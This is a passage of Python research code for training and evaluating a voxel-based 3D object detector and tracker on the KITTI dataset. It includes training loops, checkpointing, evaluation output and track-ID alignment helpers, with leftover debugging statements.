build_optim(model_tr, config_tr)\n\n criterion_tr = build_criterion(config_tr.loss)\n\n last_iter = -1\n best_mota = 0\n # if load_tr_path:\n # if False:\n # best_mota, last_iter = load_state(\n # load_tr_path, model_tr, optimizer=optimizer_tr)\n # else:\n # load_state(load_tr_path, model_tr)\n\n cudnn.benchmark = True\n\n # Data loading code\n train_transform, valid_transform = build_augmentation(config_tr.augmentation)\n\n # # train\n # train_dataset = build_dataset(\n # config_tr,\n # set_source='train',\n # evaluate=False,\n # train_transform=train_transform)\n # trainval_dataset = build_dataset(\n # config_tr,\n # set_source='train',\n # evaluate=True,\n # valid_transform=valid_transform)\n # val_dataset = build_dataset(\n # config_tr,\n # set_source='val',\n # evaluate=True,\n # valid_transform=valid_transform)\n\n # train_sampler = DistributedGivenIterationSampler(\n # train_dataset,\n # config_tr.lr_scheduler.max_iter,\n # config_tr.batch_size,\n # world_size=1,\n # rank=0,\n # last_iter=last_iter)\n\n # import pdb; pdb.set_trace()\n # train_loader = DataLoader(\n # train_dataset,\n # batch_size=config_tr.batch_size,\n # shuffle=False,\n # num_workers=config_tr.workers,\n # pin_memory=True)\n\n tb_logger = SummaryWriter(config_tr.save_path + '/events')\n logger = create_logger('global_logger', config_tr.save_path + '/log.txt')\n # logger.info('args: {}'.format(pprint.pformat(args)))\n logger.info('config: {}'.format(pprint.pformat(config_tr)))\n\n # tracking_module = TrackingModule(model_tr, criterion_tr,\n # config_tr.det_type)\n # tracking_module.model.train()\n #### tracking setup done\n\n if create_folder:\n if pathlib.Path(model_dir).exists():\n model_dir = torchplus.train.create_folder(model_dir)\n patchs = patchs or []\n model_dir = pathlib.Path(model_dir)\n model_dir.mkdir(parents=True, exist_ok=True)\n if result_path is None:\n result_path = model_dir / 'results'\n config_file_bkp = \"pipeline.config\"\n config = pipeline_pb2.TrainEvalPipelineConfig()\n with open(config_path, \"r\") as f:\n proto_str = f.read()\n text_format.Merge(proto_str, config)\n for patch in patchs:\n patch = \"config.\" + patch \n exec(patch)\n shutil.copyfile(config_path, str(model_dir / config_file_bkp))\n input_cfg = config.train_input_reader\n eval_input_cfg = config.eval_input_reader\n model_cfg = config.model.second\n train_cfg = config.train_config\n\n ######################\n # BUILD VOXEL GENERATOR\n ######################\n voxel_generator = voxel_builder.build(model_cfg.voxel_generator)\n ######################\n # BUILD TARGET ASSIGNER\n ######################\n bv_range = voxel_generator.point_cloud_range[[0, 1, 3, 4]]\n box_coder = box_coder_builder.build(model_cfg.box_coder)\n target_assigner_cfg = model_cfg.target_assigner\n target_assigner = target_assigner_builder.build(target_assigner_cfg,\n bv_range, box_coder)\n class_names = target_assigner.classes\n ######################\n # BUILD NET\n ######################\n center_limit_range = model_cfg.post_center_limit_range\n # if use_second_stage:\n # net = second_2stage_builder.build(model_cfg, voxel_generator, target_assigner)\n if use_endtoend:\n net = second_endtoend_builder_spatio.build(model_cfg, voxel_generator, target_assigner, criterion_tr, config_tr.det_type)\n else:\n net = second_builder.build(model_cfg, voxel_generator, target_assigner)\n net.cuda()\n print(\"num_trainable parameters:\", len(list(net.parameters())))\n\n for n, p in net.named_parameters():\n print(n, p.shape)\n # pth_name = './pre_weight/first_stage_gating_det/voxelnet-17013.tckpt'\n pth_name = './pre_weight/second_stage_gating_det/voxelnet-35000.tckpt'\n\n res_pre_weights = torch.load(pth_name)\n new_res_state_dict = OrderedDict()\n model_dict = net.state_dict()\n for k,v in res_pre_weights.items():\n if 'global_step' not in k:\n # if 'dir' not in k:\n new_res_state_dict[k] = v\n model_dict.update(new_res_state_dict)\n net.load_state_dict(model_dict)\n\n # for k, weight in dict(net.named_parameters()).items(): # lidar_conv, p_lidar_conv, fusion_module, w_det, w_link, appearance, point_net\n # if 'middle_feature_extractor' in '%s'%(k) or 'rpn' in '%s'%(k) or 'second_rpn' in '%s'%(k):\n # weight.requires_grad = False\n\n # BUILD OPTIMIZER\n #####################\n # we need global_step to create lr_scheduler, so restore net first.\n torchplus.train.try_restore_latest_checkpoints(model_dir, [net])\n gstep = net.get_global_step() - 1\n optimizer_cfg = train_cfg.optimizer\n if train_cfg.enable_mixed_precision:\n net.half()\n net.metrics_to_float()\n net.convert_norm_to_float(net)\n loss_scale = train_cfg.loss_scale_factor\n mixed_optimizer = optimizer_builder.build(optimizer_cfg, net, mixed=train_cfg.enable_mixed_precision, loss_scale=loss_scale)\n optimizer = mixed_optimizer\n\n # must restore optimizer AFTER using MixedPrecisionWrapper\n torchplus.train.try_restore_latest_checkpoints(model_dir,\n [mixed_optimizer])\n lr_scheduler = lr_scheduler_builder.build(optimizer_cfg, optimizer, train_cfg.steps)\n if train_cfg.enable_mixed_precision:\n float_dtype = torch.float16\n else:\n float_dtype = torch.float32\n ######################\n # PREPARE INPUT\n ######################\n # import pdb; pdb.set_trace()\n dataset = input_reader_builder_tr_vid_spatio.build(\n input_cfg,\n model_cfg,\n training=True,\n voxel_generator=voxel_generator,\n target_assigner=target_assigner,\n config_tr=config_tr,\n set_source='train',\n evaluate=False,\n train_transform=train_transform)\n eval_dataset = input_reader_builder_tr_vid_spatio.build(\n eval_input_cfg,\n model_cfg,\n training=False,\n voxel_generator=voxel_generator,\n target_assigner=target_assigner,\n config_tr=config_tr,\n set_source='val',\n evaluate=True,\n valid_transform=valid_transform)\n\n def _worker_init_fn(worker_id):\n time_seed = np.array(time.time(), dtype=np.int32)\n np.random.seed(time_seed + worker_id)\n print(f\"WORKER {worker_id} seed:\", np.random.get_state()[1][0])\n\n dataloader = torch.utils.data.DataLoader(\n dataset,\n batch_size=input_cfg.batch_size,\n shuffle=True,\n num_workers=input_cfg.num_workers,\n pin_memory=False,\n collate_fn=merge_second_batch_tr_vid_spatio,\n worker_init_fn=_worker_init_fn)\n\n eval_dataloader = torch.utils.data.DataLoader(\n eval_dataset,\n batch_size=eval_input_cfg.batch_size,\n shuffle=False,\n num_workers=eval_input_cfg.num_workers,\n pin_memory=False,\n collate_fn=merge_second_batch_tr_vid_spatio)\n \n data_iter = iter(dataloader)\n\n ######################\n # TRAINING\n ######################\n training_detail = []\n log_path = model_dir / 'log.txt'\n training_detail_path = model_dir / 'log.json'\n if training_detail_path.exists():\n with open(training_detail_path, 'r') as f:\n training_detail = json.load(f)\n logf = open(log_path, 'a')\n logf.write(proto_str)\n logf.write(\"\\n\")\n summary_dir = model_dir / 'summary'\n summary_dir.mkdir(parents=True, exist_ok=True)\n writer = SummaryWriter(str(summary_dir))\n\n total_step_elapsed = 0\n remain_steps = train_cfg.steps - net.get_global_step()\n t = time.time()\n ckpt_start_time = t\n\n total_loop = train_cfg.steps // train_cfg.steps_per_eval + 1\n clear_metrics_every_epoch = train_cfg.clear_metrics_every_epoch\n\n if train_cfg.steps % train_cfg.steps_per_eval == 0:\n total_loop -= 1\n mixed_optimizer.zero_grad()\n \n # optimizer_tr.zero_grad()\n logger = logging.getLogger('global_logger')\n best_mota = 0\n losses = AverageMeter(config_tr.print_freq)\n\n total_steps = train_cfg.steps\n total_loop = total_steps // len(dataloader)\n \n kkkk = 0\n for step in range(total_loop):\n for i, (example) in enumerate(dataloader):\n\n curr_step = 0 + i\n kkkk += 1\n lr_scheduler.step(net.get_global_step())\n\n example_torch = example_convert_to_torch(example, float_dtype)\n\n batch_size = example[\"anchors\"].shape[0]\n\n ret_dict = net(example_torch, train_param=True)\n\n cls_preds = ret_dict[\"cls_preds\"]\n loss = ret_dict[\"loss\"].mean()\n cls_loss_reduced = ret_dict[\"cls_loss_reduced\"].mean()\n loc_loss_reduced = ret_dict[\"loc_loss_reduced\"].mean()\n cls_pos_loss = ret_dict[\"cls_pos_loss\"]\n cls_neg_loss = ret_dict[\"cls_neg_loss\"]\n loc_loss = ret_dict[\"loc_loss\"]\n cls_loss = ret_dict[\"cls_loss\"]\n dir_loss_reduced = ret_dict[\"dir_loss_reduced\"]\n cared = ret_dict[\"cared\"]\n # loss_tr = ret_dict[\"loss_tr\"]\n\n if use_second_stage or use_endtoend:\n labels = ret_dict[\"labels\"]\n else:\n labels = example_torch[\"labels\"]\n if train_cfg.enable_mixed_precision:\n loss *= loss_scale\n\n try:\n loss.backward()\n except:\n abc = 1\n # import pdb; pdb.set_trace()\n # abc = 1\n # torch.nn.utils.clip_grad_norm_(net.parameters(), 10.0)\n # optimizer_tr.step()\n # optimizer_tr.zero_grad()\n mixed_optimizer.step()\n mixed_optimizer.zero_grad()\n net.update_global_step()\n net_metrics = net.update_metrics(cls_loss_reduced,\n loc_loss_reduced, cls_preds,\n labels, cared)\n\n step_time = (time.time() - t)\n t = time.time()\n metrics = {}\n num_pos = int((labels > 0)[0].float().sum().cpu().numpy())\n num_neg = int((labels == 0)[0].float().sum().cpu().numpy())\n if 'anchors_mask' not in example_torch:\n num_anchors = example_torch['anchors'].shape[1]\n else:\n num_anchors = int(example_torch['anchors_mask'][0].sum())\n global_step = net.get_global_step()\n # print(step)\n if global_step % display_step == 0:\n loc_loss_elem = [\n float(loc_loss[:, :, i].sum().detach().cpu().numpy() /\n batch_size) for i in range(loc_loss.shape[-1])\n ]\n metrics[\"type\"] = \"step_info\"\n metrics[\"step\"] = global_step\n metrics[\"steptime\"] = step_time\n metrics.update(net_metrics)\n metrics[\"loss\"] = {}\n metrics[\"loss\"][\"loc_elem\"] = loc_loss_elem\n metrics[\"loss\"][\"cls_pos_rt\"] = float(\n cls_pos_loss.detach().cpu().numpy())\n metrics[\"loss\"][\"cls_neg_rt\"] = float(\n cls_neg_loss.detach().cpu().numpy())\n if model_cfg.use_direction_classifier:\n metrics[\"loss\"][\"dir_rt\"] = float(\n dir_loss_reduced.detach().cpu().numpy())\n metrics[\"num_vox\"] = int(example_torch[\"voxels\"].shape[0])\n metrics[\"num_pos\"] = int(num_pos)\n metrics[\"num_neg\"] = int(num_neg)\n metrics[\"num_anchors\"] = int(num_anchors)\n metrics[\"lr\"] = float(\n optimizer.lr)\n\n metrics[\"image_idx\"] = example['image_idx'][0][7:]\n training_detail.append(metrics)\n flatted_metrics = flat_nested_json_dict(metrics)\n flatted_summarys = flat_nested_json_dict(metrics, \"/\")\n for k, v in flatted_summarys.items():\n if isinstance(v, (list, tuple)):\n v = {str(i): e for i, e in enumerate(v)}\n if type(v) != str and ('loc_elem' not in k):\n writer.add_scalars(k, v, global_step)\n else:\n if (type(v) != str) and ('loc_elem' not in k):\n writer.add_scalar(k, v, global_step)\n\n metrics_str_list = []\n for k, v in flatted_metrics.items():\n if isinstance(v, float):\n metrics_str_list.append(f\"{k}={v:.3}\")\n elif isinstance(v, (list, tuple)):\n if v and isinstance(v[0], float):\n v_str = ', '.join([f\"{e:.3}\" for e in v])\n metrics_str_list.append(f\"{k}=[{v_str}]\")\n else:\n metrics_str_list.append(f\"{k}={v}\")\n else:\n metrics_str_list.append(f\"{k}={v}\")\n log_str = ', '.join(metrics_str_list)\n print(log_str, file=logf)\n print(log_str)\n\n ckpt_elasped_time = time.time() - ckpt_start_time\n if ckpt_elasped_time > train_cfg.save_checkpoints_secs:\n torchplus.train.save_models(model_dir, [net, optimizer], net.get_global_step())\n\n ckpt_start_time = time.time()\n\n if kkkk > 0 and (kkkk) % config_tr.val_freq == 0:\n # if True:\n torchplus.train.save_models(model_dir, [net, optimizer], net.get_global_step())\n net.eval()\n result_path_step = result_path / f\"step_{net.get_global_step()}\"\n result_path_step.mkdir(parents=True, exist_ok=True)\n print(\"#################################\")\n print(\"#################################\", file=logf)\n print(\"# EVAL\")\n print(\"# EVAL\", file=logf)\n print(\"#################################\")\n print(\"#################################\", file=logf)\n print(\"Generate output labels...\")\n print(\"Generate output labels...\", file=logf)\n t = time.time()\n dt_annos = []\n prog_bar = ProgressBar()\n net.clear_timer()\n prog_bar.start((len(eval_dataset) + eval_input_cfg.batch_size - 1) // eval_input_cfg.batch_size)\n for example in iter(eval_dataloader):\n example = example_convert_to_torch(example, float_dtype)\n if pickle_result:\n results = predict_kitti_to_anno(\n net, example, class_names, center_limit_range,\n model_cfg.lidar_input)\n dt_annos += results\n\n else:\n _predict_kitti_to_file(net, example, result_path_step,\n class_names, center_limit_range,\n model_cfg.lidar_input)\n\n prog_bar.print_bar()\n\n sec_per_ex = len(eval_dataset) / (time.time() - t)\n print(f'generate label finished({sec_per_ex:.2f}/s). start eval:')\n print(f'generate label finished({sec_per_ex:.2f}/s). start eval:',file=logf)\n gt_annos = [\n info[\"annos\"] for info in eval_dataset.dataset.kitti_infos\n ]\n if not pickle_result:\n dt_annos = kitti.get_label_annos(result_path_step)\n # result = get_official_eval_result_v2(gt_annos, dt_annos, class_names)\n # print(json.dumps(result, indent=2), file=logf)\n result = get_official_eval_result(gt_annos, dt_annos, class_names)\n print(result, file=logf)\n print(result)\n result_1 = result.split(\"\\n\")[:5]\n result_2 = result.split(\"\\n\")[10:15]\n result_3 = result.split(\"\\n\")[20:25]\n emh = ['0_easy', '1_mod', '2_hard']\n result_save = result_1\n for i in range(len(result_save)-1):\n save_targ = result_save[i+1]\n name_val = save_targ.split(':')[0].split(' ')[0]\n value_val = save_targ.split(':')[1:]\n for ev in range(3):\n each_val = value_val[0].split(',')[ev]\n merge_txt = 'AP_kitti/car_70/' + name_val+'/'+emh[ev]\n try:\n writer.add_scalar(merge_txt, float(each_val), global_step)\n except:\n abc=1\n import pdb; pdb.set_trace()\n abc=1\n if pickle_result:\n with open(result_path_step / \"result.pkl\", 'wb') as f:\n pickle.dump(dt_annos, f)\n writer.add_text('eval_result', result, global_step)\n\n logger.info('Evaluation on validation set:')\n # MOTA, MOTP, recall, prec, F1, fp, fn, id_switches = validate(\n # val_dataset,\n # net,\n # str(0 + 1),\n # config_tr,\n # result_path_tr,\n # part='val')\n # print(MOTA, MOTP, recall, prec, F1, fp, fn, id_switches)\n\n # curr_step = step\n # if tb_logger is not None:\n # tb_logger.add_scalar('prec', prec, curr_step)\n # tb_logger.add_scalar('recall', recall, curr_step)\n # tb_logger.add_scalar('mota', MOTA, curr_step)\n # tb_logger.add_scalar('motp', MOTP, curr_step)\n # tb_logger.add_scalar('fp', fp, curr_step)\n # tb_logger.add_scalar('fn', fn, curr_step)\n # tb_logger.add_scalar('f1', F1, curr_step)\n # tb_logger.add_scalar('id_switches', id_switches, curr_step)\n # if lr_scheduler is not None:\n # tb_logger.add_scalar('lr', current_lr, curr_step)\n\n # is_best = MOTA > best_mota\n # best_mota = max(MOTA, best_mota)\n # print(best_mota)\n\n # import pdb; pdb.set_trace()\n # save_checkpoint(\n # { 'step': net.get_global_step(),\n # 'score_arch': config_tr.model.score_arch,\n # 'appear_arch': config_tr.model.appear_arch,\n # 'best_mota': best_mota,\n # 'state_dict': tracking_module.model.state_dict(),\n # 'optimizer': tracking_module.optimizer.state_dict(),\n # }, is_best, config_tr.save_path + '/ckpt')\n\n # net.train()\n\n # save model before exit\n torchplus.train.save_models(model_dir, [net, optimizer],\n net.get_global_step())\n logf.close()\n\n\ndef _predict_kitti_to_file(net,\n example,\n result_save_path,\n class_names,\n center_limit_range=None,\n lidar_input=False):\n batch_image_shape = example['image_shape']\n batch_imgidx = example['image_idx']\n predictions_dicts, assign_det, assign_link, assign_new, assign_end = net(example)\n # t = time.time()\n for i, preds_dict in enumerate(predictions_dicts):\n image_shape = batch_image_shape[i]\n img_idx = preds_dict[\"image_idx\"][7:]\n if preds_dict[\"bbox\"] is not None or preds_dict[\"bbox\"].size.numel():\n box_2d_preds = preds_dict[\"bbox\"].data.cpu().numpy()\n box_preds = preds_dict[\"box3d_camera\"].data.cpu().numpy()\n scores = preds_dict[\"scores\"].data.cpu().numpy()\n box_preds_lidar = preds_dict[\"box3d_lidar\"].data.cpu().numpy()\n # write pred to file\n box_preds = box_preds[:, [0, 1, 2, 4, 5, 3,\n 6]] # lhw->hwl(label file format)\n label_preds = preds_dict[\"label_preds\"].data.cpu().numpy()\n # label_preds = np.zeros([box_2d_preds.shape[0]], dtype=np.int32)\n result_lines = []\n for box, box_lidar, bbox, score, label in zip(\n box_preds, box_preds_lidar, box_2d_preds, scores,\n label_preds):\n if not lidar_input:\n if bbox[0] > image_shape[1] or bbox[1] > image_shape[0]:\n continue\n if bbox[2] < 0 or bbox[3] < 0:\n continue\n # print(img_shape)\n if center_limit_range is not None:\n limit_range = np.array(center_limit_range)\n if (np.any(box_lidar[:3] < limit_range[:3])\n or np.any(box_lidar[:3] > limit_range[3:])):\n continue\n bbox[2:] = np.minimum(bbox[2:], image_shape[::-1])\n bbox[:2] = np.maximum(bbox[:2], [0, 0])\n result_dict = {\n 'name': class_names[int(label)],\n 'alpha': -np.arctan2(-box_lidar[1], box_lidar[0]) + box[6],\n 'bbox': bbox,\n 'location': box[:3],\n 'dimensions': box[3:6],\n 'rotation_y': box[6],\n 'score': score,\n }\n result_line = kitti.kitti_result_line(result_dict)\n result_lines.append(result_line)\n else:\n result_lines = []\n result_file = f\"{result_save_path}/{kitti.get_image_index_str(img_idx)}.txt\"\n result_str = '\\n'.join(result_lines)\n with open(result_file, 'w') as f:\n f.write(result_str)\n\n\ndef predict_kitti_to_anno(net,\n example,\n class_names,\n center_limit_range=None,\n lidar_input=False,\n global_set=None):\n batch_image_shape = example['image_shape']\n batch_imgidx = example['image_idx']\n predictions_dicts = net(example, False)\n # t = time.time()\n annos = []\n for i, preds_dict in enumerate(predictions_dicts):\n image_shape = batch_image_shape[i]\n img_idx = preds_dict[\"image_idx\"][7:]\n if preds_dict[\"bbox\"] is not None or preds_dict[\"bbox\"].size.numel() != 0:\n box_2d_preds = preds_dict[\"bbox\"].detach().cpu().numpy()\n box_preds = preds_dict[\"box3d_camera\"].detach().cpu().numpy()\n scores = preds_dict[\"scores\"].detach().cpu().numpy()\n box_preds_lidar = preds_dict[\"box3d_lidar\"].detach().cpu().numpy()\n # write pred to file\n label_preds = preds_dict[\"label_preds\"].detach().cpu().numpy()\n # label_preds = np.zeros([box_2d_preds.shape[0]], dtype=np.int32)\n anno = kitti.get_start_result_anno()\n num_example = 0\n for box, box_lidar, bbox, score, label in zip(\n box_preds, box_preds_lidar, box_2d_preds, scores,\n label_preds):\n if not lidar_input:\n if bbox[0] > image_shape[1] or bbox[1] > image_shape[0]:\n continue\n if bbox[2] < 0 or bbox[3] < 0:\n continue\n # print(img_shape)\n if center_limit_range is not None:\n limit_range = np.array(center_limit_range)\n if (np.any(box_lidar[:3] < limit_range[:3])\n or np.any(box_lidar[:3] > limit_range[3:])):\n continue\n bbox[2:] = np.minimum(bbox[2:], image_shape[::-1])\n bbox[:2] = np.maximum(bbox[:2], [0, 0])\n anno[\"name\"].append(class_names[int(label)])\n anno[\"truncated\"].append(0.0)\n anno[\"occluded\"].append(0)\n anno[\"alpha\"].append(-np.arctan2(-box_lidar[1], box_lidar[0]) +\n box[6])\n anno[\"bbox\"].append(bbox)\n anno[\"dimensions\"].append(box[3:6])\n anno[\"location\"].append(box[:3])\n anno[\"rotation_y\"].append(box[6])\n if global_set is not None:\n for i in range(100000):\n if score in global_set:\n score -= 1 / 100000\n else:\n global_set.add(score)\n break\n anno[\"score\"].append(score)\n\n num_example += 1\n if num_example != 0:\n anno = {n: np.stack(v) for n, v in anno.items()}\n annos.append(anno)\n else:\n annos.append(kitti.empty_result_anno())\n else:\n annos.append(kitti.empty_result_anno())\n num_example = annos[-1][\"name\"].shape[0]\n # import pdb; pdb.set_trace()\n annos[-1][\"image_idx\"] = np.array(\n [img_idx] * num_example, dtype=np.int64)\n return annos\n\ndef evaluate(config_path,\n model_dir,\n use_second_stage=False,\n use_endtoend=False,\n result_path=None,\n predict_test=False,\n ckpt_path=None,\n ref_detfile=None,\n pickle_result=True,\n measure_time=False,\n batch_size=None):\n model_dir = pathlib.Path(model_dir)\n if predict_test:\n result_name = 'predict_test_0095'\n else:\n result_name = 'eval_results'\n if result_path is None:\n result_path = model_dir / result_name\n else:\n result_path = pathlib.Path(result_path)\n config = pipeline_pb2.TrainEvalPipelineConfig()\n with open(config_path, \"r\") as f:\n proto_str = f.read()\n text_format.Merge(proto_str, config)\n\n input_cfg = config.eval_input_reader\n model_cfg = config.model.second\n train_cfg = config.train_config\n \n center_limit_range = model_cfg.post_center_limit_range\n ######################\n # BUILD VOXEL GENERATOR\n ######################\n voxel_generator = voxel_builder.build(model_cfg.voxel_generator)\n bv_range = voxel_generator.point_cloud_range[[0, 1, 3, 4]]\n box_coder = box_coder_builder.build(model_cfg.box_coder)\n target_assigner_cfg = model_cfg.target_assigner\n target_assigner = target_assigner_builder.build(target_assigner_cfg,\n bv_range, box_coder)\n class_names = target_assigner.classes\n if use_second_stage: \n net = second_2stage_builder.build(model_cfg, voxel_generator, target_assigner, measure_time=measure_time)\n elif use_endtoend:\n net = second_endtoend_builder.build(model_cfg, voxel_generator, target_assigner, measure_time=measure_time)\n else:\n net = second_builder.build(model_cfg, voxel_generator, target_assigner, measure_time=measure_time)\n net.cuda()\n #########################################\n # net = torch.nn.DataParallel(net)\n #########################################\n if ckpt_path is None:\n torchplus.train.try_restore_latest_checkpoints(model_dir, [net])\n else:\n torchplus.train.restore(ckpt_path, net)\n if train_cfg.enable_mixed_precision:\n net.half()\n print(\"half inference!\")\n net.metrics_to_float()\n net.convert_norm_to_float(net)\n batch_size = batch_size or input_cfg.batch_size\n eval_dataset = input_reader_builder_tr.build(\n input_cfg,\n model_cfg,\n training=False,\n voxel_generator=voxel_generator,\n target_assigner=target_assigner)\n eval_dataloader = torch.utils.data.DataLoader(\n eval_dataset,\n batch_size=batch_size,\n shuffle=False,\n num_workers=0,# input_cfg.num_workers,\n pin_memory=False,\n collate_fn=merge_second_batch)\n\n if train_cfg.enable_mixed_precision:\n float_dtype = torch.float16\n else:\n float_dtype = torch.float32\n\n net.eval()\n result_path_step = result_path / f\"step_{net.get_global_step()}\"\n result_path_step.mkdir(parents=True, exist_ok=True)\n t = time.time()\n dt_annos = []\n global_set = None\n print(\"Generate output labels...\")\n bar = ProgressBar()\n bar.start((len(eval_dataset) + batch_size - 1) // batch_size)\n prep_example_times = []\n prep_times = []\n t2 = time.time()\n for example in iter(eval_dataloader):\n if measure_time:\n prep_times.append(time.time() - t2)\n t1 = time.time()\n torch.cuda.synchronize()\n example = example_convert_to_torch(example, float_dtype)\n if measure_time:\n torch.cuda.synchronize()\n prep_example_times.append(time.time() - t1)\n\n if pickle_result:\n dt_annos += predict_kitti_to_anno(\n net, example, class_names, center_limit_range,\n model_cfg.lidar_input, global_set)\n else:\n _predict_kitti_to_file(net, example, result_path_step, class_names,\n center_limit_range, model_cfg.lidar_input)\n # print(json.dumps(net.middle_feature_extractor.middle_conv.sparity_dict))\n bar.print_bar()\n if measure_time:\n t2 = time.time()\n\n sec_per_example = len(eval_dataset) / (time.time() - t)\n print(f'generate label finished({sec_per_example:.2f}/s). start eval:')\n if measure_time:\n print(f\"avg example to torch time: {np.mean(prep_example_times) * 1000:.3f} ms\")\n print(f\"avg prep time: {np.mean(prep_times) * 1000:.3f} ms\")\n for name, val in net.get_avg_time_dict().items():\n print(f\"avg {name} time = {val * 1000:.3f} ms\")\n if not predict_test:\n gt_annos = [info[\"annos\"] for info in eval_dataset.dataset.kitti_infos]\n img_idx = [info[\"image_idx\"] for info in eval_dataset.dataset.kitti_infos]\n if not pickle_result:\n dt_annos = kitti.get_label_annos(result_path_step)\n result = get_official_eval_result(gt_annos, dt_annos, class_names)\n # print(json.dumps(result, indent=2))\n print(result)\n result = get_coco_eval_result(gt_annos, dt_annos, class_names)\n print(result)\n if pickle_result:\n with open(result_path_step / \"result.pkl\", 'wb') as f:\n pickle.dump(dt_annos, f)\n # annos to txt file\n if True:\n os.makedirs(str(result_path_step) + '/txt', exist_ok=True)\n for i in range(len(dt_annos)):\n dt_annos[i]['dimensions'] = dt_annos[i]['dimensions'][:, [1, 2, 0]]\n result_lines = kitti.annos_to_kitti_label(dt_annos[i])\n image_idx = img_idx[i]\n with open(str(result_path_step) + '/txt/%06d.txt' % image_idx, 'w') as f:\n for result_line in result_lines:\n f.write(result_line + '\\n')\n abcd = 1\n else:\n os.makedirs(str(result_path_step) + '/txt', exist_ok=True)\n img_idx = [info[\"image_idx\"] for info in eval_dataset.dataset.kitti_infos]\n for i in range(len(dt_annos)):\n dt_annos[i]['dimensions'] = dt_annos[i]['dimensions'][:, [1, 2, 0]]\n result_lines = kitti.annos_to_kitti_label(dt_annos[i])\n image_idx = img_idx[i]\n with open(str(result_path_step) + '/txt/%06d.txt' % image_idx, 'w') as f:\n for result_line in result_lines:\n f.write(result_line + '\\n')\n\n\ndef save_config(config_path, save_path):\n config = pipeline_pb2.TrainEvalPipelineConfig()\n with open(config_path, \"r\") as f:\n proto_str = f.read()\n text_format.Merge(proto_str, config)\n ret = text_format.MessageToString(config, indent=2)\n with open(save_path, 'w') as f:\n f.write(ret)\n\ndef assign_det_id(self, assign_det, assign_link, assign_new, assign_end,\n det_split, dets):\n det_start_idx = 0\n det_ids = []\n already_used_id = []\n fake_ids = []\n dets_out = []\n\n for i in range(len(det_split)):\n frame_id = []\n det_curr_num = det_split[i].item()\n fake_id = []\n det_out = get_start_gt_anno()\n for j in range(det_curr_num):\n curr_det_idx = det_start_idx + j\n # check w_det\n if assign_det[curr_det_idx] != 1:\n fake_id.append(-1)\n continue\n else:\n # det_out.append(dets[i][j])\n det_out['name'].append(dets[i]['name'][:, j])\n det_out['truncated'].append(dets[i]['truncated'][:, j])\n det_out['occluded'].append(dets[i]['occluded'][:, j])\n det_out['alpha'].append(dets[i]['alpha'][:, j])\n det_out['bbox'].append(dets[i]['bbox'][:, j])\n det_out['dimensions'].append(dets[i]['dimensions'][:, j])\n det_out['location'].append(dets[i]['location'][:, j])\n det_out['rotation_y'].append(dets[i]['rotation_y'][:, j])\n\n # w_det=1, check whether a new det\n if i == 0:\n if len(already_used_id) == 0:\n frame_id.append(0)\n fake_id.append(0)\n already_used_id.append(0)\n det_out['id'].append(torch.Tensor([0]).long())\n else:\n new_id = already_used_id[-1] + 1\n frame_id.append(new_id)\n fake_id.append(new_id)\n already_used_id.append(new_id)\n det_out['id'].append(torch.Tensor([new_id]).long())\n continue\n elif assign_new[curr_det_idx] == 1:\n new_id = already_used_id[-1] + 1 if len(\n already_used_id) > 0 else 0\n frame_id.append(new_id)\n fake_id.append(new_id)\n already_used_id.append(new_id)\n det_out['id'].append(torch.Tensor([new_id]).long())\n else:\n # look prev\n det_prev_num = det_split[i - 1]\n for k in range(det_prev_num):\n if assign_link[i - 1][0][k][j] == 1:\n prev_id = fake_ids[-1][k]\n frame_id.append(prev_id)\n fake_id.append(prev_id)\n det_out['id'].append(\n torch.Tensor([prev_id]).long())\n break\n\n assert len(fake_id) == det_curr_num\n fake_ids.append(fake_id)\n det_ids.append(np.array(frame_id))\n for k, v in det_out.items():\n if len(det_out[k]) == 0:\n det_out[k] = torch.Tensor([])\n else:\n det_out[k] = torch.cat(v, dim=0)\n det_out['frame_idx'] = dets[i]['frame_idx']\n dets_out.append(det_out)\n det_start_idx += det_curr_num\n return det_ids, dets_out\n\ndef align_id(self, dets_ids, dets_out):\n frame_start = 0\n if len(self.used_id) == 0:\n # Start of a sequence\n self.used_id += dets_ids\n self.frames_id += dets_ids\n self.frames_det += dets_out\n max_id = 0\n for i in range(len(dets_ids)):\n if dets_out[i]['id'].size(0) == 0:\n continue\n max_id = np.maximum(np.max(dets_ids[i]), max_id)\n self.last_id = np.maximum(self.last_id, max_id)\n return dets_ids, dets_out, frame_start\n elif self.frames_det[-1]['frame_idx'] != dets_out[0]['frame_idx']:\n # in case the sequence is not continuous\n aligned_ids = []\n aligned_dets = []\n max_id = 0\n id_offset = self.last_id + 1\n for i in range(len(dets_ids)):\n if dets_out[i]['id'].size(0) == 0:\n aligned_ids.append([])\n continue\n new_id = dets_ids[i] + id_offset\n max_id = np.maximum(np.max(new_id), max_id)\n aligned_ids.append(new_id)\n dets_out[i]['id'] += id_offset\n aligned_dets += dets_out\n self.last_id = np.maximum(self.last_id, max_id)\n self.frames_id += aligned_ids\n self.frames_det += aligned_dets\n return aligned_ids, aligned_dets, frame_start\n else:\n # the first frame of current dets\n # and the last frame of last dets is the same\n frame_start = 1\n aligned_ids = []\n aligned_dets = []\n max_id = 0\n id_pairs = {}\n \"\"\"\n assert len(dets_ids[0])== len(self.frames_id[-1])\n \"\"\"\n # Calculate Id pairs\n for i in range(len(dets_ids[0])):\n # Use minimum because because sometimes\n # they are not totally the same\n has_match = False\n for j in range(len(self.frames_id[-1])):\n if ((self.det_type == '3D'\n and torch.sum(dets_out[0]['location'][i] !=\n self.frames_det[-1]['location'][j]) == 0\n and torch.sum(dets_out[0]['bbox'][i] !=\n self.frames_det[-1]['bbox'][j]) == 0)\n or (self.det_type == '2D' and torch.sum(\n dets_out[0]['bbox'][i] != self.frames_det[-1]\n ['bbox'][j]) == 0)): # noqa\n\n id_pairs[dets_ids[0][i]] = self.frames_id[-1][j]\n has_match = True\n break\n if not has_match:\n id_pairs[dets_ids[0][i]] = self.last_id + 1\n self.last_id += 1\n if len([v for k, v in id_pairs.items()]) != len(\n set([v for k, v in id_pairs.items()])):\n print(\"ID pairs has duplicates!!!\")\n print(id_pairs)\n print(dets_ids)\n print(dets_out[0])\n print(self.frames_id[-1])\n print(self.frames_det[-1])\n\n for i in range(1, len(dets_ids)):\n if dets_out[i]['id'].size(0) == 0:\n aligned_ids.append([])\n continue\n new_id = dets_ids[i].copy()\n for j in range(len(dets_ids[i])):\n if dets_ids[i][j] in id_pairs.keys():\n new_id[j] = id_pairs[dets_ids[i][j]]\n else:\n new_id[j] = self.last_id + 1\n id_pairs[dets_ids[i][j]] = new_id[j]\n self.last_id += 1\n if len(new_id) != len(\n set(new_id)): # check whether there is duplicate\n print('have duplicates!!!')\n print(id_pairs)\n print(new_id)\n print(dets_ids)\n print(dets_out)\n 